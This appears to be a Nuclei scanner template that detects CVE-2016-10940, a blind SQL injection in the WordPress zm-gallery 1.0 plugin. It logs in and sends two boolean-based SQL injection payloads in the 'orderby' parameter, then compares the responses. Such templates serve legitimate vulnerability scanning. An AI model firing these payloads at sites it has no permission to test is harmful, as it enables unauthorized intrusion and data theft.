my-nuclei-templates/CVE-2016-10940.yaml

51 lines
1.9 KiB
YAML

id: CVE-2016-10940
info:
name: WordPress zm-gallery plugin 1.0 SQL Injection
author: cckuailong,daffainfo
severity: high
description: zm-gallery plugin 1.0 for WordPress is susceptible to SQL injection via the order parameter.
reference:
- https://wpscan.com/vulnerability/c0cbd314-0f4f-47db-911d-9b2e974bd0f6
- https://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/
- https://nvd.nist.gov/vuln/detail/CVE-2016-10940
- http://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2016-10940
cwe-id: CWE-89
tags: cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1
Host: {{Hostname}}
req-condition: true
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_1 == 302 && status_code_2 == 200 && status_code_3 == 200'
- 'contains(body_2, "[zm_gallery id=")'
- 'contains(body_2, "<th scope=\"row\" class=\"check-column\">")'
- '!contains(body_3, "<th scope=\"row\" class=\"check-column\">")'
condition: and
# Enhanced by mp on 2022/04/12